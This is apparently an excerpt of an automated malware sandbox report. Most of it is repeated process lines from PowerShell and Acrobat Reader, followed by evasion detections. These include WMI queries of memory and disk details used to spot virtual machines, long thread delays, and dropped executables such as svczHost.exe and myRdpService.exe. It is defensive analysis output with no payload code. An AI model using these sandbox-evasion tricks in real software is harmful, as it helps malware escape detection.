      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Queries memory information (via WMI often done to detect virtual machines)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
      Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
      Source: C:\Windows\Temp\svczHost.exeMemory allocated: 179E6CC0000 memory reserve | memory write watch
      Source: C:\Windows\Temp\myRdpService.exeMemory allocated: 2D7382F0000 memory reserve | memory write watch
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9923Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9854Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9836Jump to behavior
      Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 474
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9913
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9847
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9866
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wpyeyr2r\wpyeyr2r.dllJump to dropped file
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5060Thread sleep count: 9854 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5880Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5880Thread sleep time: -900000s >= -30000sJump to behavior
